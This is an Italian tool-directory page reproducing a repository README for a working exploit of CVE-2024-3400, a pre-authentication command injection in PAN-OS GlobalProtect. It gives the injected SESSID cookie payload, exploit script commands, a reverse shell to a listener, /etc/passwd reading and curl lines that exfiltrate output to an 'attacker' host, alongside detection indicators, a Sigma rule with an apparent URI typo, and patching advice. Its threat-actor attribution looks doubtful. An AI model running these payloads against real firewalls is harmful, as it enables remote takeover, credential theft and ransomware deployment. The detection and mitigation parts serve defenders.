Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2024-3400-panos_rce_reproduction — Riproduzione di cve-2024-3400-panos_rce_reproduction | Kitploit
Strumenti/GitHubGitHub/razureink/cve-2024-3400-panos_rce_reproduction
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneRed TeamingLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
razureink/cve-2024-3400-panos_rce_reproduction

cve-2024-3400-panos_rce_reproduction

Riproduzione di cve-2024-3400-panos_rce_reproduction

Vedi Repository
27 giorni faNon ancora revisionato

CVE-2024-3400: Palo Alto PAN-OS GlobalProtect Command Injection RCE

CVSS 10.0 CRITICO | CWE-78: Iniezione di Comandi del Sistema Operativo | Sfruttato Massicciamente nel Mondo Reale


Panoramica

CVE-2024-3400 è una vulnerabilità di iniezione di comandi pre-autenticazione nelle interfacce del portale e del gateway GlobalProtect di Palo Alto Networks PAN-OS. La vulnerabilità consente a un attaccante non autenticato di eseguire comandi arbitrari con privilegi di root sul firewall interessato.

  • Scoperta da: Volexity (aprile 2024)
  • Attore della minaccia attribuito: UNC4554 / Midnight Blizzard (sponsorizzato dallo stato russo)
  • ID CVE: CVE-2024-3400
  • Punteggio CVSS: 10.0 (Critico)
  • CWE: CWE-78 (Neutralizzazione impropria di elementi speciali usati in un comando del sistema operativo)
  • Impatto: Compromissione totale degli apparati firewall PAN-OS, movimento laterale, distribuzione di ransomware
  • Stato: Sfruttato attivamente come 0-day prima della divulgazione pubblica

Dettagli Tecnici

Causa Principale

La vulnerabilità risiede nella gestione dei cookie di sessione del componente portale e gateway GlobalProtect. La funzione responsabile dell'elaborazione del cookie SESSID non sanifica correttamente l'input fornito dall'utente prima di passarlo a un comando shell.

Nello specifico, una richiesta HTTP non autenticata all'endpoint del portale GlobalProtect (/global-protect/login.esp) con un cookie SESSID appositamente costruito contenente metacaratteri di shell incorporati (backtick ed espansione di variabili) provoca l'iniezione di comandi.

Meccanismo di Iniezione

Il percorso di codice vulnerabile opera come segue:

  1. Il portale GlobalProtect riceve una richiesta a /global-protect/login.esp
  2. Il valore del cookie SESSID viene estratto senza sanificazione
  3. Questo valore viene interpolato in una stringa di comando shell
  4. Il comando viene eseguito tramite system() o una funzione simile di esecuzione di comandi del sistema operativo
  5. Poiché l'applicazione viene eseguita come root, il comando iniettato viene eseguito con pieni privilegi di sistema

Costruzione del Payload

Il payload di iniezione utilizza comandi delimitati da backtick all'interno del cookie SESSID:

root@kitploit:~
SESSID=/../../../opt/panlogs/tmp/device_telemetry/`COMMAND`.py

Il path traversal (/../../../) esce dalla directory prevista e la parte COMMAND racchiusa tra backtick fa sì che la shell esegua l'input dell'attaccante. È possibile utilizzare meccanismi di redirezione dell'output o reverse shell per esfiltrare i risultati dei comandi.


Versioni Interessate

Versione PAN-OSInteressateCorretta in
10.2.x< 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h110.2.4-h16 / 10.2.5-h6 / 10.2.6-h3 / 10.2.7-h8 / 10.2.8-h3 / 10.2.9-h1

Nota: PAN-OS 9.x e versioni precedenti non sono interessate. Cloud NGFW e Prisma Access non sono interessati.


Sfruttamento

Vettore di Attacco

  • Rete: Remoto
  • Autenticazione: Nessuna richiesta
  • Privilegio Richiesto: Nessuno
  • Interazione dell'Utente: Nessuna
  • Impatto: Compromissione completa di riservatezza, integrità e disponibilità

Attività Osservata dell'Attore della Minaccia

UNC4554 / Midnight Blizzard (APT29) è stato osservato mentre sfruttava CVE-2024-3400 come 0-day a partire da marzo 2024. Volexity ha pubblicato la propria analisi il 12 aprile 2024. I modelli di attacco includevano:

  1. Accesso Iniziale: Scansione massiccia dei portali GlobalProtect esposti
  2. Esecuzione di Comandi: Distribuzione di backdoor Python personalizzate tramite il vettore di iniezione nei cookie
  3. Persistenza: Installazione della backdoor UPSTYLE, furto di credenziali, estrazione della configurazione
  4. Movimento Laterale: Utilizzo dei firewall compromessi come punti di appoggio nelle reti interne
  5. Esfiltrazione di Dati: Furto di file di configurazione, credenziali VPN e token di sessione
  6. Ransomware: Numerosi incidenti di distribuzione di ransomware dopo la compromissione iniziale

Disponibilità di Proof-of-Concept

Sono stati rilasciati molteplici PoC pubblici. Questo repository fornisce un exploit funzionante per test autorizzati.


Passaggi per la Riproduzione

Requisiti

  • Python 3.8+
  • Libreria requests
  • Target: Palo Alto PAN-OS con un portale GlobalProtect vulnerabile esposto
  • Solo accesso autorizzato

Impostazione

root@kitploit:~
pip install requests

Exploit di Base

root@kitploit:~
python exploit.py --target https://vulnerable-firewall.example.com --command "id"

Esempio di Reverse Shell

root@kitploit:~
# Start listener on attacker machine
nc -lvnp 4444

# Execute reverse shell
python exploit.py --target https://vuln-panos.example.com \
  --command "bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"

Lettura Arbitraria di File

root@kitploit:~
python exploit.py --target https://vuln-panos.example.com --command "cat /etc/passwd"

Prova di Concetto (curl)

root@kitploit:~
# Basic command execution test
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`id\`.py" \
  'https://target/global-protect/login.esp'

# Command output capture via DNS exfiltration
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`wget -O- http://attacker/$(id|base64)\`.py" \
  'https://target/global-protect/login.esp'

Script PoC

Consulta exploit.py in questo repository per un exploit Python completo che supporta:

  • Esecuzione di comandi arbitrari
  • Supporto proxy opzionale (Burp Suite / mitmproxy)
  • Controllo della verifica SSL
  • Gestione di timeout e tentativi
  • Analisi delle risposte

Rilevamento

Indicatori di Compromissione (IoC)

  • Richieste a /global-protect/login.esp con cookie SESSID insolitamente lunghi o sospetti
  • Cookie contenenti sequenze di path traversal (/../../) combinate con caratteri backtick
  • Processi inattesi generati dal componente GlobalProtect
  • Connessioni in uscita dal firewall verso indirizzi IP sconosciuti su porte insolite
  • File scritti in /opt/panlogs/tmp/device_telemetry/ con estensione .py

Regola Sigma (Semplificata)

root@kitploit:~
title: CVE-2024-3400 PAN-OS GlobalProtect Command Injection
status: stable
logsource:
  category: webserver
detection:
  selection:
    cs-uri-query: "/global-protocol/login.esp"
    cs-cookie|contains:
      - "../"
      - "`"
  condition: selection

Mitigazione

Azioni Immediate

  1. Aggiornare PAN-OS alle versioni corrette elencate sopra
  2. Se l'applicazione immediata delle patch non è possibile, applicare una delle seguenti soluzioni alternative:
    • Disabilitazione della telemetria del dispositivo: set deviceconfig system telemetry disable yes (blocca il percorso di codice vulnerabile senza richiedere un riavvio)
    • Controllo degli accessi a portale/gateway GlobalProtect: Limitare l'accesso a indirizzi IP di origine attendibili
  3. Verificare la compromissione: Controllare la presenza di file non autorizzati in /opt/panlogs/tmp/device_telemetry/
  4. Esaminare i log: Controllare i log di accesso GlobalProtect per valori anomali del cookie SESSID

Correzione Definitiva

Applicare l'hotfix fornito da Palo Alto Networks. La correzione sanifica correttamente l'input del cookie prima della costruzione del comando shell.

Valutazione della Compromissione

Se sospetti uno sfruttamento:

  1. Raccogliere immagini forensi dei firewall interessati
  2. Verificare tutte le modifiche alla configurazione (timestamp dell'ultima modifica)
  3. Esaminare i processi in esecuzione e i cron job
  4. Controllare la presenza di chiavi SSH e account utente non autorizzati
  5. Ruotare tutte le credenziali VPN e i segreti condivisi
  6. Ispezionare il traffico di rete per individuare pattern di comunicazione C2

Riferimenti


Disclaimer

Questo repository è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi. Lo sfruttamento non autorizzato di questa vulnerabilità è illegale. Gli autori non sono responsabili dell'uso improprio di queste informazioni. Assicurati sempre di avere un'autorizzazione scritta esplicita prima di testare qualsiasi sistema.


Licenza

Licenza MIT - Questo contenuto è fornito per ricerca di sicurezza difensiva e test autorizzati.

Scarica lo strumento
11.0.x
< 11.0.1-h10, < 11.0.2-h4, < 11.0.3-h10
11.0.1-h10 / 11.0.2-h4 / 11.0.3-h10
11.1.x< 11.1.1-h311.1.1-h3
FonteLink
Avviso di Sicurezza Palo Altohttps://security.paloaltonetworks.com/CVE-2024-3400
Analisi di Volexityhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-command-injection-vulnerability-in-palo-alto-networks-pan-os/
Voce NVDhttps://nvd.nist.gov/vuln/detail/CVE-2024-3400
Dettaglio CWE-78https://cwe.mitre.org/data/definitions/78.html
CISA KEVhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog
Tecnica ATT&CKhttps://attack.mitre.org/techniques/T1190/